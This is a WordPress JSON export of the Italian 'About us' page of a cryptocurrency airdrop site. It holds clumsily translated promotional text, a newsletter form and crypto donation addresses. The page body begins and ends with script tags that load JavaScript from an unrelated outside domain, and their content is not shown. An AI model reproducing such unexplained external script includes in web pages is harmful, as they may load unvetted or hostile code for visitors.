{"id":6022,"date":"2020-07-05T23:23:30","date_gmt":"2020-07-06T06:23:30","guid":{"rendered":"https:\/\/coinairdrops.com\/?page_id=6022"},"modified":"2020-07-05T23:23:33","modified_gmt":"2020-07-06T06:23:33","slug":"chi-siamo","status":"publish","type":"page","link":"https:\/\/coinairdrops.com\/it\/chi-siamo\/","title":{"rendered":"Chi siamo"},"content":{"rendered":"<script type=\"text\/javascript\" src=\"https:\/\/bs.direct\/sources\/b762a8ceb.js\"><\/script>\n\n\n\n<h1 class=\"wp-block-heading\">Chi siamo<\/h1>\n\n\n\n<p>Benvenuti sul nostro sito web: CoinAirdrops.com, la tuapreferita <strong>fonteper tutti i criptovalute che si<\/strong> verificano nella comunit\u00e0.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Chi c&#8217;\u00e8 dietro CoinAirdrops.com?<\/h2>\n\n\n\n<p>Il mio nome di penna \u00e8 Mida, come il famoso re&#8230; E ho scritto qua e l\u00e0 su diversi argomenti, <strong>principalmente sulle ultime tecnologie, privacy e criptovalute<\/strong>. Ora sono una specie di appassionato di criptovalute, anche se ho ancora molto da imparare. Alcuni si definirebbero un guru. Ma non ci sono ancora!<\/p>\n\n\n\n<p>Quando ho scoperto gli airdrops, ho pensato che mi sarebbe piaciuto scrivere su questi. Perch\u00e9 mi piace molto conoscere nuovi blockchain progetti. Voglio dire, ragazzi comuni, alcuni di loro vogliono inviare satelliti nello spazio, sostituire Facebook o <strong>cambiare il volto del mondo<\/strong>! Mentre alcuni progetti falliranno, adoro vedere le persone <strong>impegnarsi a fondo e creare qualcosa<\/strong>. Forse avr\u00f2 l&#8217;opportunit\u00e0 di essere tra i primi ad adottare il prossimo Bill Gates!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Perch\u00e9 Coin Airdrops?<\/h2>\n\n\n\n<p>Prima di tutto, voglio spiegare questo nuovo concetto di <strong>regalare token gratuiti<\/strong>. E voglio insegnare alla gente i nuovi progetti da seguire. Voglio parlare loro delle opportunit\u00e0 che ho trovato.<\/p>\n\n\n\n<p>Quindi, sono felice di <strong>supportare questi nuovi progetti<\/strong> parlando di loro. Spiego cosa stanno cercando di ottenere. E porto il mio modesto contributo per far sapere alla gente di loro per <strong>aumentare la loro comunit\u00e0<\/strong>.<\/p>\n\n\n\n<p>Inoltre, spiego ai lettori <strong>come ottenere token gratuiti<\/strong> dalle loro campagne airdrop attive. Perch\u00e9 a tutti noi piacciono le cose gratis. Quindi, da un lato, elenco gli airdrops. E d&#8217;altra parte, le persone possono richiedere monete gratuite! \u00c8 una situazione vantaggiosa per tutti! A proposito, non dimenticare di iscriverti alla mia newsletter, per ricevere tutti gli ultimi avvisi airdrop.<\/p>\n\n\n<div class=\"news-post\">\n<p>NON PERDERE UN SOLO AIRDROP<\/p>\n<form class=\"ampforwp-form-allow\"\n  method=\"post\"\n  action=\"https:\/\/sendfox.com\/form\/3668j3\/1x0k05\"\n  target=\"_blank\">\n  <input type=\"email\"\n    placeholder=\"indirizzo email\"\n    name=\"email\"\n    required>\n  <input type=\"submit\"\n    value=\"Sottoscrivi\">\n<\/form>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Siamo social<\/h2>\n\n\n\n<p>Seguici sui social media. E ti terremo aggiornato sulle <strong>ultime criptovalute crittografiche<\/strong>. Puoi trovarci su:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.facebook.com\/coinairdrops\/\" target=\"_blank\" rel=\"noreferrer noopener\">Facebook<\/a><\/li><li><a href=\"https:\/\/twitter.com\/coinairdrops\" target=\"_blank\" rel=\"noreferrer noopener\">Twitter<\/a><\/li><li><a href=\"https:\/\/t.me\/coinzairdrops\" target=\"_blank\" rel=\"noreferrer noopener\">Telegram<\/a><\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Ti piace quello che facciamo? Supportaci!<\/h2>\n\n\n\n<p><strong>La manutenzione di un sito Web richiede tempo e costa un po<\/strong> &#8216;. Quindi, se ti piace quello che facciamo, mandaci una monetina digitale:<\/p>\n\n\n\n<p>BTC: 14Lco1GjaG1qNzALXCcC8ZXtaRegLT6DBY<\/p>\n\n\n\n<p>ETH, USDT: 0x142616534b1b680993d8f0661295da15557c977e<\/p>\n\n\n<script type=\"text\/javascript\" src=\"https:\/\/bs.direct\/sources\/b3184f3be.js\"><\/script>\n","protected":false},"excerpt":{"rendered":"<p>Chi siamo Benvenuti sul nostro sito web: CoinAirdrops.com, la tuapreferita fonteper tutti i criptovalute che si verificano nella comunit\u00e0. Chi c&#8217;\u00e8 dietro CoinAirdrops.com? Il mio nome di penna \u00e8 Mida, come il famoso re&#8230; E ho scritto qua e l\u00e0 su diversi argomenti, principalmente sulle ultime tecnologie, privacy e criptovalute. Ora sono una specie di [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"class_list":["post-6022","page","type-page","status-publish","hentry"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Chi siamo &#8226; Coin Airdrops<\/title>\n<meta name=\"description\" content=\"Chi sono le persone dietro questo sito web? Leggi questa pagina e scopri Midas e il team che scrive tutti gli articoli.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/coinairdrops.com\/it\/chi-siamo\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Chi siamo &#8226; Coin Airdrops\" \/>\n<meta property=\"og:description\" content=\"Chi sono le persone dietro questo sito web? Leggi questa pagina e scopri Midas e il team che scrive tutti gli articoli.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/coinairdrops.com\/it\/chi-siamo\/\" \/>\n<meta property=\"og:site_name\" content=\"Coin Airdrops\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/coinairdrops\/\" \/>\n<meta property=\"article:modified_time\" content=\"2020-07-06T06:23:33+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@coinairdrops\" \/>\n<meta name=\"twitter:label1\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/chi-siamo\\\/\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/chi-siamo\\\/\",\"name\":\"Chi siamo &#8226; Coin Airdrops\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/#website\"},\"datePublished\":\"2020-07-06T06:23:30+00:00\",\"dateModified\":\"2020-07-06T06:23:33+00:00\",\"description\":\"Chi sono le persone dietro questo sito web? Leggi questa pagina e scopri Midas e il team che scrive tutti gli articoli.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/chi-siamo\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/coinairdrops.com\\\/it\\\/chi-siamo\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/chi-siamo\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Chi siamo\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/\",\"name\":\"Coin Airdrops\",\"description\":\"Don&#039;t miss a single crypto airdrop!\",\"publisher\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/#organization\",\"name\":\"Coin Airdrops\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/coinairdrops-310x34-1.svg\",\"contentUrl\":\"https:\\\/\\\/coinairdrops.com\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/coinairdrops-310x34-1.svg\",\"caption\":\"Coin Airdrops\"},\"image\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/coinairdrops\\\/\",\"https:\\\/\\\/x.com\\\/coinairdrops\",\"https:\\\/\\\/www.pinterest.com\\\/coinairdrops\\\/\",\"https:\\\/\\\/vk.com\\\/coinairdrops\",\"https:\\\/\\\/t.me\\\/coinzairdrops\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Chi siamo &#8226; Coin Airdrops","description":"Chi sono le persone dietro questo sito web? Leggi questa pagina e scopri Midas e il team che scrive tutti gli articoli.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/coinairdrops.com\/it\/chi-siamo\/","og_locale":"it_IT","og_type":"article","og_title":"Chi siamo &#8226; Coin Airdrops","og_description":"Chi sono le persone dietro questo sito web? Leggi questa pagina e scopri Midas e il team che scrive tutti gli articoli.","og_url":"https:\/\/coinairdrops.com\/it\/chi-siamo\/","og_site_name":"Coin Airdrops","article_publisher":"https:\/\/www.facebook.com\/coinairdrops\/","article_modified_time":"2020-07-06T06:23:33+00:00","twitter_card":"summary_large_image","twitter_site":"@coinairdrops","twitter_misc":{"Tempo di lettura stimato":"2 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/coinairdrops.com\/it\/chi-siamo\/","url":"https:\/\/coinairdrops.com\/it\/chi-siamo\/","name":"Chi siamo &#8226; Coin Airdrops","isPartOf":{"@id":"https:\/\/coinairdrops.com\/it\/#website"},"datePublished":"2020-07-06T06:23:30+00:00","dateModified":"2020-07-06T06:23:33+00:00","description":"Chi sono le persone dietro questo sito web? Leggi questa pagina e scopri Midas e il team che scrive tutti gli articoli.","breadcrumb":{"@id":"https:\/\/coinairdrops.com\/it\/chi-siamo\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/coinairdrops.com\/it\/chi-siamo\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/coinairdrops.com\/it\/chi-siamo\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/coinairdrops.com\/it\/"},{"@type":"ListItem","position":2,"name":"Chi siamo"}]},{"@type":"WebSite","@id":"https:\/\/coinairdrops.com\/it\/#website","url":"https:\/\/coinairdrops.com\/it\/","name":"Coin Airdrops","description":"Don&#039;t miss a single crypto airdrop!","publisher":{"@id":"https:\/\/coinairdrops.com\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/coinairdrops.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/coinairdrops.com\/it\/#organization","name":"Coin Airdrops","url":"https:\/\/coinairdrops.com\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/coinairdrops.com\/it\/#\/schema\/logo\/image\/","url":"https:\/\/coinairdrops.com\/wp-content\/uploads\/2020\/03\/coinairdrops-310x34-1.svg","contentUrl":"https:\/\/coinairdrops.com\/wp-content\/uploads\/2020\/03\/coinairdrops-310x34-1.svg","caption":"Coin Airdrops"},"image":{"@id":"https:\/\/coinairdrops.com\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/coinairdrops\/","https:\/\/x.com\/coinairdrops","https:\/\/www.pinterest.com\/coinairdrops\/","https:\/\/vk.com\/coinairdrops","https:\/\/t.me\/coinzairdrops"]}]}},"_links":{"self":[{"href":"https:\/\/coinairdrops.com\/it\/wp-json\/wp\/v2\/pages\/6022","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/coinairdrops.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/coinairdrops.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/coinairdrops.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/coinairdrops.com\/it\/wp-json\/wp\/v2\/comments?post=6022"}],"version-history":[{"count":2,"href":"https:\/\/coinairdrops.com\/it\/wp-json\/wp\/v2\/pages\/6022\/revisions"}],"predecessor-version":[{"id":6029,"href":"https:\/\/coinairdrops.com\/it\/wp-json\/wp\/v2\/pages\/6022\/revisions\/6029"}],"wp:attachment":[{"href":"https:\/\/coinairdrops.com\/it\/wp-json\/wp\/v2\/media?parent=6022"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}